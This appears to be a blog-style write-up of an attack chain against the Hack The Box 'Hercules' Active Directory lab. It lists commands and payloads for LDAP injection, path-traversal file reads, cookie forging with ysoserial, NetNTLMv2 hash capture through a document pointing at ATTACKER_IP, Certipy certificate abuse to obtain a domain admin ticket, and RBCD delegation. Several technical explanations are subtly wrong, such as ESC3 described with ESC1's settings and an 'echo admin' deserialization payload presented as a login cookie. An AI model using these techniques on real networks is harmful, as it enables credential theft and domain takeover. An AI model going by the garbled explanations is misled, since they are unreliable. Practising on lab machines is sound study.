Listen to this Post

Introduction:
Active Directory (AD) is the cornerstone of modern corporate networks, and understanding its attack surface is paramount for both red and blue teams. The Hack The Box “Hercules” machine presents an insane-level challenge that meticulously replicates a hardened enterprise environment, complete with automated countermeasures. This deep dive explores the complete attack chain, from initial foothold to full domain compromise, providing a masterclass in advanced AD exploitation.
Learning Objectives:
- Understand and execute a multi-stage Kerberos-based attack chain in a restricted NTLM environment.
- Master critical abuse techniques for Active Directory Certificate Services (AD CS).
- Learn to operate effectively within a dynamically resetting environment, automating attacks for persistence.
You Should Know:
1. LDAP Filter Injection for Initial Foothold
A common web vulnerability can be the key to unlocking an AD environment. LDAP filter injection allows an attacker to manipulate queries to extract sensitive data.
`(objectClass=))(&(objectClass=)(|(uid=admin)(userPassword=))` – A basic LDAP injection payload to bypass authentication or extract information.
Step-by-step guide:
This payload is designed to be inserted into a vulnerable LDAP login or search field. The initial part, (objectClass=)), closes the original filter. The new filter, (&(objectClass=)(|(uid=admin)(userPassword=)), then uses the OR (|) operator to check for either a known username (uid=admin) or, crucially, a valid `userPassword` attribute. If the application reflects any part of the query result, it can reveal valid usernames or even password hashes, providing the initial credential pair needed to proceed.
2. Local File Inclusion (LFI) to MachineKey Extraction
Once a low-privileged web shell or access is obtained, Local File Inclusion can be used to read critical system files, such as the machineKey, which is used for encryption and decryption of ASP.NET authentication tickets.
`https://vulnerable-site.com/page.aspx?file=..\..\..\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config` – A classic Windows LFI path traversal to retrieve the web.config file.
Step-by-step guide:
The `machineKey` values (validationKey and decryptionKey) are often stored in the `web.config` file. By exploiting an LFI vulnerability and traversing the directory structure with ..\, an attacker can target this specific file. Once retrieved, these keys can be used to forge valid authentication cookies, effectively impersonating any user, including administrators, on the web application.
3. Forging Authentication Cookies with MachineKey
With the `machineKey` in hand, an attacker can forge a valid Forms Authentication Ticket (like .ASPXAUTH).
`aspnet_regiis -px “MyKeys” “keys.xml” -pri` – This command exports the RSA key container (containing the machineKey) to an XML file, which can then be used by tools like `ysoserial.net` to generate a malicious cookie.
Step-by-step guide:
First, the exported machine key (in XML format) is used with a serialization tool. The command to generate a forged cookie for the user “admin” would look like: ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "echo admin" --legacy. The output is a base64-encoded payload. This payload is then set as the value of the application’s authentication cookie in the browser. When the server decrypts and deserializes this cookie, it grants access as the forged user.
4. Capturing NetNTLMv2 Hashes with a Malicious Document
With NTLM disabled for direct authentication, attackers can coerce authentication attempts over the network to capture crackable hashes.
`python3 responder.py -I eth0 -wrf` – Command to start Responder, which listens for and responds to network name resolution requests (LLMNR, NBT-NS), poisoning them to capture hashes.
Step-by-step guide:
A malicious document (e.g., a Word file) is created and uploaded via the compromised web application. This document contains an embedded image that sources its data from a UNC path like \\ATTACKER_IP\share\image.png. When a user with domain privileges opens the document, their system attempts to authenticate to the attacker’s IP address. Responder, running on the attacker’s machine, answers the name resolution request and challenges the client, capturing the resulting NetNTLMv2 hash. This hash can then be taken offline for cracking with tools like Hashcat (hashcat -m 5600 hash.txt rockyou.txt).
5. Enumerating AD CS with Certipy
Active Directory Certificate Services often present critical misconfigurations that can be exploited for privilege escalation.
`certipy find -u [email protected] -p Password -dc-ip 10.10.10.10 -vulnerable` – This Certipy command enumerates the AD CS environment and automatically identifies templates with known security weaknesses.
Step-by-step guide:
After obtaining valid domain credentials, run Certipy to list all certificate templates and their properties. The tool flags templates vulnerable to attacks like ESC1 (misconfigured template allowing enrollment for any user) or ESC3 (improper agent certificate settings). The output will detail the template name, enrollment rights, and the specific vulnerability, providing a clear target for the next phase of the attack.
6. Exploiting Certificate Templates for Domain Privileges (ESC3)
The ESC3 vulnerability involves a template where the “ENROLLEE_SUPPLIES_SUBJECT” option is enabled and an “Enrollment Agent” restriction is improperly configured.
`certipy req -u [email protected] -p Password -dc-ip 10.10.10.10 -ca DOMAIN-CA -template VulnerableTemplate -upn [email protected]` – This command requests a certificate on behalf of the domain administrator.
Step-by-step guide:
Using Certipy, an attacker with a regular user account requests a certificate from the vulnerable template. By specifying the `-upn` parameter as the administrator’s User Principal Name, the issued certificate will be for the domain admin account. This certificate can then be used with `certipy auth -pfx admin.pfx -dc-ip 10.10.10.10` to perform Kerberos authentication and retrieve the administrator’s Ticket-Granting-Ticket (TGT), granting full control over the domain.
7. Resource-Based Constrained Delegation (RBCD) for Persistence
RBCD allows a machine account to impersonate users on a specific service. This can be abused if an attacker can control a computer object’s attributes.
`PowerView: Set-DomainObject -Identity TargetServer -Set @{‘msDS-AllowedToActOnBehalfOfOtherIdentity’=(Get-DomainComputer AttackerPC).SID}` – This PowerShell command using PowerView configures RBCD on a target server to allow the attacker-controlled computer account to delegate to it.
Step-by-step guide:
First, an attacker with the ability to add a new machine to the domain (often via a default attribute like ms-DS-MachineAccountQuota) creates a computer account they control. Using tools like PowerView, they then modify the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a high-value target server (e.g., a SQL server) to add the SID of their controlled computer. Finally, they use the S4U2Self and S4U2Proxy Kerberos extensions to request a service ticket for the target service on behalf of a privileged user, effectively achieving lateral movement with elevated privileges.
What Undercode Say:
- Automation is Non-Negotiable: In environments with automated defenses, manual execution is futile. The entire attack chain, from hash capture to certificate abuse, must be scripted for rapid, repeated execution between reset cycles.
- The Perimeter is Deeper Than You Think: The initial web vulnerability was merely a gateway. The core of the attack resided deep within AD CS misconfigurations and Kerberos delegation abuses, highlighting that external hardening is useless without internal consistency.
The Hercules machine is a stark reminder that modern AD security is a complex puzzle. Disabling legacy protocols like NTLM is a good start, but it creates a false sense of security if the Kerberos ecosystem, particularly AD CS, is not meticulously hardened. This scenario demonstrates that a single misconfigured certificate template can completely undermine an otherwise robust security posture, rendering complex network segmentation and monitoring ineffective against a determined attacker.
Prediction:
The techniques demonstrated in the Hercules scenario, particularly the abuse of AD CS, represent the immediate future of enterprise network penetration. As NTLM is phased out and direct lateral movement becomes harder, attackers will increasingly pivot to abusing trusted core services like PKI and Kerberos delegation. Defenders must shift their focus from perimeter-centric models to deep, continuous internal assessment, specifically auditing certificate templates and delegation rights with the same rigor applied to user group membership today. The era of certificate-based post-exploitation is already here.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Nauman Kahnn – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


